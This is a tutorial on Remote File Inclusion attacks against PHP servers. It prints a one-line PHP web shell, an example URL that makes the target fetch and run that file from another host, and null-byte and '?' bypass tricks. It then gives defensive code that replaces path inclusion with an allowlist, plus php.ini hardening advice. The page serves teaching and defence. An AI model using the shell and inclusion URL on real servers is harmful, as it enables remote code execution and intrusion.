Remote File Inclusion

This is the second of the two file-inclusion methods for remote code execution, and the easier of the two. Instead of poisoning some local file and then including it, the contaminated file is fetched from a remote server and executed on the webserver.

The first step is to identify the technology used by the webserver, since the contaminated file has to be written in the same scripting language. For our example we will assume that the webserver uses PHP.

The remote contaminated file will contain the following code:

<?php echo shell_exec($_GET['cmd']); ?>

So if the webserver has the flaw of fetching and executing a remote file, the URL would look like this:

http://192.168.1.1/pricinglist.php?file=http://192.168.1.2/contaminated.txt&cmd=ipconfig

Before accessing the URL, don't forget to start netcat or whatever tool you plan to use to capture the incoming request.

Some webservers may have the flaw but limit access by appending ".php" to the end of the filename. For example, the parameter format could be "file=xyz" and the server could append ".php" to it before fetching the file. In such cases the webserver can be made to ignore the appended extension by adding a null byte, "%00", to the end of the URL.

Another trick is to add "?" to the end of the URL, so that anything the server appends after it is treated as part of a query string rather than as part of the file name.
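The fix on the server side, for both the plain remote-include flaw and the appended-".php" variant above, is to never use the request parameter as a path at all. The following is an added example, not code from the original page: the vulnerable `include` pattern that the `pricinglist.php?file=` URL exploits, beside a hardened version that maps the parameter onto a fixed allowlist of local files. The page names (`pricing`, `contact`), the `pages/` directory and the function names are assumptions chosen for illustration.

```php
<?php
// Added example (not from the original page). File names, the pages/
// directory and the function names are assumed for illustration.

// --- Vulnerable pattern: the flaw behind "pricinglist.php?file=..." ---
// The request value is used directly as a path and ".php" is appended.
// With allow_url_include=On in php.ini, a value such as
// "http://attacker/contaminated.txt" is fetched and executed.
function include_unsafe(string $file): void
{
    include $file . '.php';
}

// --- Hardened pattern: the parameter is only ever a lookup key ---
// Every includable file is listed here; nothing else can be included.
const ALLOWED_PAGES = [
    'pricing' => 'pricing.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the allowlisted file, or null if the
// request value is not an exact allowlist key.
function resolve_page(string $requested): ?string
{
    // Only a short plain token is accepted. URL schemes ("http://"),
    // directory traversal (".."), a decoded null byte ("%00") and the
    // trailing "?" trick all fail this check before anything else runs.
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $requested)) {
        return null;
    }
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }

    $pagesDir = realpath(__DIR__ . '/pages');
    $real     = realpath($pagesDir . '/' . ALLOWED_PAGES[$requested]);

    // Defence in depth: the resolved file must still live inside pages/.
    if ($pagesDir === false || $real === false
        || strpos($real, $pagesDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function include_safe(string $requested): void
{
    $path = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Same parameter name the vulnerable URL abuses; default to a known page.
include_safe($_GET['file'] ?? 'pricing');
```

Two points worth checking on any PHP host besides the code: `allow_url_include` should be `Off` in php.ini (it has been off by default since PHP 5.2, so a working remote include usually means someone turned it on), and `allow_url_fopen` should be off as well if the application does not need to open remote URLs. The null-byte trick is also rejected by the PHP runtime itself from 5.3.4 onward (paths containing a NUL are refused), but the allowlist above does not rely on that; it rejects the value before it is ever treated as a path.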
